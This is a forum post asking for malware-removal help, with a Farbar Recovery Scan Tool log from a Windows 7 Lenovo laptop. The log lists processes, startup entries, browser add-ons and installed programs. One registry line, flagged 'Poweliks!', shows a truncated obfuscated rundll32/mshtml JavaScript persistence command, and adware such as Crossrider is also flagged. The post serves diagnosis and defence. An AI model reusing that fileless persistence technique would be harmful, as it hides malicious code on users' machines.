
dllhost file on syswow64 spyware - FRST done



This seems to be a popular spyware issue. I've followed the instructions and run the FRST program. Results below. Help is very much appreciated!!

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 29-10-2014 01
Ran by Charles (administrator) on CHARLES-THINK on 29-10-2014 12:57:12
Running from C:\Users\Charles\Desktop
Loaded Profile: Charles (Available profiles: Charles)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
() C:\Windows\System32\DTS.exe
(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(AuthenTec, Inc.) C:\Windows\System32\AtService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcPrfMgrSvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe
(Viewpoint Corporation) C:\Program Files (x86)\Viewpoint\Common\ViewpointService.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcSvc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\loggingserver.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPOSDSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ZOOM\TpScrex.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Lenovo.) C:\Windows\System32\TpShocks.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Client Security Solution\cssauth.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Viewpoint Corporation) C:\Program Files (x86)\Viewpoint\Viewpoint Manager\ViewMgr.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\SvcGuiHlpr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Client Security Solution\password_manager.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
() C:\Program Files (x86)\AVG Web TuneUp\vprot.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Client Security Solution\password_manager.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
(Dropbox, Inc.) C:\Users\Charles\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE
(InterVideo) C:\Program Files (x86)\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\AMT\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Lenovo Group Limited) C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Intel Corporation) C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(AVG Secure Search) C:\Program Files (x86)\AVG Web TuneUp\avgcefrend.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [picon] => C:\Program Files (x86)\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [358424 2009-08-03] (Intel Corporation)
HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [380704 2009-07-08] (Lenovo.)
HKLM\...\Run: [FingerPrintSoftware] => C:\Program Files\Lenovo Fingerprint Software\fpapp.exe [1582328 2009-09-01] (AuthenTec)
HKLM\...\Run: [AcWin7Hlpr] => C:\Program Files (x86)\Lenovo\Access Connections\AcTBenabler.exe [63832 2014-03-14] (Lenovo)
HKLM\...\Run: [cssauth] => C:\Program Files\Lenovo\Client Security Solution\cssauth.exe [5990200 2011-06-10] (Lenovo Group Limited)
HKLM\...\Run: [LenVolFx] => C:\Windows\LenVolEx64.exe [15208 2009-11-02] (Lenovo)
HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [60920 2013-05-29] (Lenovo Group Limited)
HKLM\...\Run: [smartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [307768 2009-11-19] ()
HKLM-x32\...\Run: [PWMTRV] => rundll32 "C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.DLL",PwrMgrBkGndMonitor
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [WheelMouse] => C:\Advanced Wheel Mouse\wh_exec.exe [86016 2007-03-11] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-06] (Apple Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840592 2014-09-04] (Adobe Systems Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41360 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [450560 2013-08-21] (DivX, LLC)
HKLM-x32\...\Run: [DivXUpdate] => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1861968 2013-08-28] ()
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3649040 2014-10-16] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG Web TuneUp\vprot.exe [3037208 2014-10-29] ()
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\AdobeCollabSync.exe [1104288 2014-09-04] (Adobe Systems Incorporated)
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [ROC_ROC_APR2013_AV] => C:\Users\Charles\AppData\Roaming\AVG April 2013 Campaign\AVG-Secure-Search-Update.exe /PROMPT --mid 1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d --CMPID ROC_APR2013_AV
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [AVG-Secure-Search-Update_0913a] => C:\Users\Charles\AppData\Roaming\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid 1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d --CMPID 0913a
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\MountPoints2: {f397cc25-9f37-11e0-9bf5-00226819c704} - D:\LaunchU3.exe
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Lsa: [Notification Packages] scecli ACGina
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Charles\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Charles\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.msn.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://www.lenovo.com/welcome/thinkpad
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - DefaultScope {7ABD5EFD-88A6-E9CE-80AE-DBCA8C52F41C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z134&form=ZGAIDF&install_date=20110828&iesrc={referrer:source}
SearchScopes: HKCU - VWPT URL = http://search.viewpoint.com/pl/search?tab=1&k={searchTerms}&addr=1&query=vb=1%26tn%3D0%26addr%3D1%26type%3Drel39%5fvista%26instid%3DViewpointV39%5fvista
SearchScopes: HKCU - {7ABD5EFD-88A6-E9CE-80AE-DBCA8C52F41C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z134&form=ZGAIDF&install_date=20110828&iesrc={referrer:source}
SearchScopes: HKCU - {95B7759C-8C7F-4BF1-B163-73684A933233} URL = https://mysearch.avg.com/search?cid={CF064197-EF34-483D-9875-B1E2E5BC5836}&mid=1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d&lang=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-10-29 11:52:56&v=4.0.0.17&pid=wtu&sg=&sap=dsp&q={searchTerms}
SearchScopes: HKCU - {D552A914-C4D7-44A7-89F3-51389FAACF75} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: AVG Web TuneUp -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> C:\Program Files (x86)\AVG Web TuneUp\4.0.0.17\AVG Web TuneUp.dll (AVG)
BHO-x32: Viewpoint Toolbar BHO -> {A7327C09-B521-4EDB-8509-7D2660C9EC98} -> C:\Program Files (x86)\Viewpoint\Viewpoint Toolbar\3.9.0\ViewBarBHO.dll (Viewpoint Corporation)
BHO-x32: CrossRider -> {A876E312-7D08-401a-B7A6-FAFC5DC2F292} -> C:\Program Files (x86)\CrossriderWebApps\Crossrider.dll ()
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: IePasswordManagerHelper Class -> {BF468356-BB7E-42D7-9F15-4F3B9BCFCED2} -> C:\Program Files (x86)\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Viewpoint Toolbar - {F8AD5AA5-D966-4667-9DAF-2561D68B2012} - C:\Program Files (x86)\Common Files\Viewpoint\Toolbar Runtime\3.9.0\IEViewBar.dll (Viewpoint Corporation)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {2DAD3559-2923-4935-AD49-B673D2539944} http://www-307.ibm.com/pc/support/acpir.cab
DPF: HKLM-x32 {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: HKLM-x32 {9E472D58-F10C-11CF-B7A9-0020AFD6A362} https://vault.netvoyage.com/neWeb2/neWebCl.cab
DPF: HKLM-x32 {9E472D6A-F10C-11CF-B7A9-0020AFD6A362} https://vault.netvoyage.com/neWeb2/neCrypto.cab
DPF: HKLM-x32 {CC679CB8-DC4B-458B-B817-D447B3B6AC31} https://vpn01.bcm.edu/CACHE/stc/1/binaries/vpnweb.cab
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.10\ViProtocol.dll (AVG Secure Search)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default
FF DefaultSearchEngine: AVG Secure Search
FF SelectedSearchEngine: AVG Secure Search
FF Homepage: https://mysearch.avg.com?cid={CF064197-EF34-483D-9875-B1E2E5BC5836}&mid=1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d&lang=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-10-29 11:52:56&v=4.0.0.17&pid=wtu&sg=&sap=hp
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.10\\npsitesafety.dll No File
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll (DivX, LLC)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF SearchPlugin: C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\searchplugins\avg-secure-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\wtu-secure-search.xml
FF Extension: AVG Web TuneUp - C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\Extensions\avg@toolbar [2014-10-29]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2012-03-16]
FF HKCU\...\Firefox\Extensions: [{F74D5734-46F5-4B16-96F0-1E7FBF41B750}] - C:\Program Files (x86)\Lenovo\Client Security Solution\PWM Firefox Extension\2.0b12
FF Extension: ThinkVantage Password Manager - C:\Program Files (x86)\Lenovo\Client Security Solution\PWM Firefox Extension\2.0b12 [2013-11-21]

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [jpnbdefcbnoefmmcpelplabbkfmfhlho] - C:\ProgramData\CodecCheck\chrome\codec_check.crx [2011-08-28]

 

 

ADDITION.TXT

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-10-2014 01
Ran by Charles at 2014-10-29 12:50:13
Running from C:\Users\Charles\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 Registry Patch to arrange icons in Device and Printers folder of Windows 7 (HKLM\...\W7DevOR) (Version: 1.00 - )
2007 Microsoft Office system (HKLM-x32\...\PROHYBRIDR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Access Help (HKLM-x32\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 3.00 - Lenovo)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.12 - Adobe Systems)
Adobe Flash Player 10 Plugin (HKLM-x32\...\{0DFB3DE8-65B9-44FF-AA0A-3BECC5A2BFD1}) (Version: 10.0.32.18 - Adobe Systems, Inc.)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Advanced Wheel Mouse 6.0.0.001 (HKLM-x32\...\WheelMouse) (Version:  - )
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Audio / Video Codec Pack (HKLM-x32\...\{B21C0FF0-AECF-47F7-9036-A1A32B10A168}) (Version: 2.0.015 - )
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5557 - AVG Technologies)
AVG 2015 (Version: 15.0.4189 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5557 - AVG Technologies) Hidden
AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.0.0.17 - AVG Technologies)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Business Contact Manager for Outlook 2007 SP2 (HKLM-x32\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (x32 Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Client Security - Password Manager (HKLM\...\{3FD730D4-755F-439B-8082-B55E00924A44}) (Version: 8.30.0049.00 - Lenovo Group Limited)
Conexant 20561 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.92.12.0 - Conexant)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
Crossrider Web Apps (HKLM-x32\...\Crossrider) (Version:  - ) <==== ATTENTION
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Diablo II (HKLM-x32\...\Diablo II) (Version:  - Blizzard Entertainment)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
DivX Setup (HKLM-x32\...\DivX Setup) (Version: 2.6.1.100 - DivX, LLC)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.30 - Dropbox, Inc.)
E-Transcript Bundle Viewer (HKLM-x32\...\{72AE5ECD-0CAF-4017-BC86-E2908014C09C}) (Version: 5.0.2.132 - Thomson Reuters)
FileZilla Client 3.7.2 (HKLM-x32\...\FileZilla Client) (Version: 3.7.2 - Tim Kosse)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Hanword HWP document converter for Microsoft Word (x64) (HKLM\...\{90150000-2009-0409-1000-0000000FF1CE}) (Version: 15.0.4454.1506 - Microsoft Corporation)
HP Officejet Pro 8500 A910 Basic Device Software (HKLM\...\{33A06AC3-F20D-417A-B621-83A73771624E}) (Version: 22.0.334.0 - Hewlett-Packard Co.)
HP Officejet Pro 8500 A910 Help (HKLM-x32\...\{13D324E9-9DB1-478D-944C-28BBE1BB80DC}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet Pro 8500 A910 Product Improvement Study (HKLM\...\{963EF6DD-DE6B-43D8-A2AC-9217FD39958F}) (Version: 22.0.334.0 - Hewlett-Packard Co.)
HP Update (HKLM-x32\...\{787D1A33-A97B-4245-87C0-7174609A540C}) (Version: 5.002.005.003 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
Intel® Management Engine Interface (HKLM\...\HECI) (Version:  - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version:  - )
Intel® PROSet/Wireless WiFi Software (HKLM\...\{CCAFF072-4DDB-4846-963D-15F02A8E9472}) (Version: 13.00.0000 - Intel Corporation)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
